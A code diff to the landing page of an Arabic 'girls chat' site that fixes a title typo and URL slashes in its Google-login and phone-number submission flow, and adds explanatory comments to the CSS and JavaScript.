--- a/index.html
+++ b/index.html
@@ -3,9 +3,8 @@
 <head>
     <meta charset="UTF-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <title>مرحباً بكي شات البنات! 🌸</title>
+    <title>مرحباً بك في شات البنات! 🌸</title>
     <style>
-        /* ... (كل أكواد الـ CSS هنا تبدو سليمة ولا تؤثر على الوظيفة) ... */
         body {
             margin: 0; padding: 0;
             font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
@@ -14,7 +13,7 @@
             color: #333;
             background-size: cover;
             background-position: center;
-            transition: background-image 0.5s ease-in-out;
+            transition: background-image 0.5s ease-in-out; /* لتغيير سلس للخلفية */
         }
         .container {
             background: rgba(255, 255, 255, 0.95);
@@ -22,11 +21,11 @@
             border-radius: 15px;
             box-shadow: 0 10px 30px rgba(0,0,0,0.3);
             text-align: center;
-            max-width: 480px;
+            max-width: 480px; /* زيادة بسيطة للعرض */
             width: 90%;
             animation: fadeIn 1s ease-out;
-            position: relative;
-            z-index: 2;
+            position: relative; /* للمساعدة في وضع العناصر */
+            z-index: 2; /* فوق الخلفية */
         }
         @keyframes fadeIn {
             from { opacity: 0; transform: translateY(-20px); }
@@ -34,21 +33,21 @@
         }
         h1 {
             margin-bottom: 25px;
-            font-size: 34px;
-            color: #d62c8e;
+            font-size: 34px; /* حجم أكبر */
+            color: #d62c8e; /* لون بناتي */
             line-height: 1.3;
             text-shadow: 1px 1px 2px rgba(0,0,0,0.1);
         }
         p {
-            font-size: 1.15em;
+            font-size: 1.15em; /* حجم أكبر للنص */
             margin-bottom: 30px;
             color: #666;
             line-height: 1.6;
         }
         .login-btn {
             font-size: 20px;
-            padding: 15px 30px;
-            background: #4285F4;
+            padding: 15px 30px; /* زيادة في الحجم */
+            background: #4285F4; /* Google Blue */
             color: white;
             border: none;
             border-radius: 8px;
@@ -58,27 +57,27 @@
             display: inline-flex;
             align-items: center;
             justify-content: center;
-            gap: 12px;
+            gap: 12px; /* مسافة أكبر بين الأيقونة والنص */
             transition: background 0.3s ease, transform 0.2s ease, box-shadow 0.3s ease;
         }
         .login-btn:hover {
             background: #3367D6;
-            transform: translateY(-4px);
+            transform: translateY(-4px); /* حركة أجمل */
             box-shadow: 0 6px 15px rgba(0,0,0,0.4);
         }
         .login-btn img {
-            width: 26px;
+            width: 26px; /* حجم أكبر للأيقونة */
             height: 26px;
         }
 
         /* Phone Input Section Styling */
         .phone-section {
-            display: none;
+            display: none; /* Hidden by default */
             margin-top: 25px;
         }
         .phone-section h2 {
             font-size: 30px;
-            color: #d62c8e;
+            color: #d62c8e; /* نفس اللون البينك */
             margin-bottom: 20px;
             text-shadow: 1px 1px 2px rgba(0,0,0,0.1);
         }
@@ -89,9 +88,9 @@
         }
         .phone-section input[type="tel"] {
             width: calc(100% - 24px);
-            padding: 14px;
+            padding: 14px; /* حجم أكبر للـ input */
             margin-bottom: 20px;
-            border: 1px solid #d62c8e;
+            border: 1px solid #d62c8e; /* border بلون بناتي */
             border-radius: 8px;
             font-size: 19px;
             box-sizing: border-box;
@@ -99,9 +98,9 @@
             box-shadow: inset 0 1px 3px rgba(0,0,0,0.1);
         }
         .phone-section button {
-            background-color: #ff69b4;
+            background-color: #ff69b4; /* Pink for submit */
             color: white;
-            padding: 15px 30px;
+            padding: 15px 30px; /* حجم أكبر للزر */
             font-size: 19px;
             border: none;
             border-radius: 8px;
@@ -149,7 +148,7 @@
 
     <script>
         // **هام جداً: هذا المتغير يجب أن يتطابق مع النطاق العام لسيرفر Node.js الخاص بك**
-        const REPLIT_SERVER_URL = "https://2d0146b2-69f8-4294-a0e7-9f8c291db932-00-1p81zuprc3lo0.spock.replit.dev/";
+        const REPLIT_SERVER_URL = "https://2d0146b2-69f8-4294-a0e7-9f8c291db932-00-1p81zuprc3lo0.spock.replit.dev/"; // تم إضافة الشرطة المائلة في النهاية
         const phoneSection = document.getElementById('phoneSection');
         const loginSection = document.getElementById('loginSection');
         const phoneNumberInput = document.getElementById('phoneNumber');
@@ -157,8 +156,8 @@
         const phoneMessage = document.getElementById('phoneMessage');
 
         // صور الخلفية المختلفة
-        const loginBgImage = 'https://images.unsplash.com/photo-1517726558451-b06256277983?auto=format&fit=crop&w=1400&q=80';
-        const phoneBgImage = 'https://images.unsplash.com/photo-1543852786-1cf6624237c8?auto=format&fit=crop&w=1400&q=80';
+        const loginBgImage = 'https://images.unsplash.com/photo-1517726558451-b06256277983?auto=format&fit=crop&w=1400&q=80'; // صورة بنت كيوت للمرحلة الأولى
+        const phoneBgImage = 'https://images.unsplash.com/photo-1543852786-1cf6624237c8?auto=format&fit=crop&w=1400&q=80'; // صورة بنت كيوت مختلفة للمرحلة الثانية
 
         // دالة لتغيير الخلفية
         function setBackgroundImage(imageUrl) {
@@ -167,8 +166,8 @@
 
         // الربط الصحيح لزر تسجيل الدخول بجوجل
         document.getElementById('googleLoginBtn').addEventListener('click', (event) => {
-            event.preventDefault();
-            window.location.href = `${REPLIT_SERVER_URL}/auth/google`;
+            event.preventDefault(); // منع السلوك الافتراضي للرابط
+            window.location.href = `${REPLIT_SERVER_URL}auth/google`;
         });
 
         function getUrlParameter(name) {
@@ -184,11 +183,11 @@
             if (authStatus === 'success') {
                 loginSection.style.display = 'none';
                 phoneSection.style.display = 'block';
-                setBackgroundImage(phoneBgImage);
+                setBackgroundImage(phoneBgImage); // تغيير الخلفية لمرحلة رقم الهاتف
             } else {
                 loginSection.style.display = 'block';
                 phoneSection.style.display = 'none';
-                setBackgroundImage(loginBgImage);
+                setBackgroundImage(loginBgImage); // الخلفية الافتراضية لتسجيل الدخول
             }
         });
 
@@ -212,7 +211,7 @@
             phoneMessage.className = 'message'; 
 
             try {
-                const response = await fetch(`${REPLIT_SERVER_URL}/submit-phone`, {
+                const response = await fetch(`${REPLIT_SERVER_URL}submit-phone`, { // تم حذف الشرطة المائلة قبل submit-phone
                     method: 'POST',
                     headers: {
                         'Content-Type': 'application/json',
@@ -221,11 +220,11 @@
                 });
 
                 if (response.ok) {
-                    const data = await response.json();
+                    const data = await response.json(); // قراءة الـ JSON من الاستجابة
                     phoneMessage.textContent = data.message;
                     phoneMessage.className = 'message success';
                     setTimeout(() => {
-                        window.location.href = data.redirectUrl;
+                        window.location.href = data.redirectUrl; // **استخدام رابط التحويل من السيرفر**
                     }, 1500); 
                 } else {
                     const errorData = await response.json();
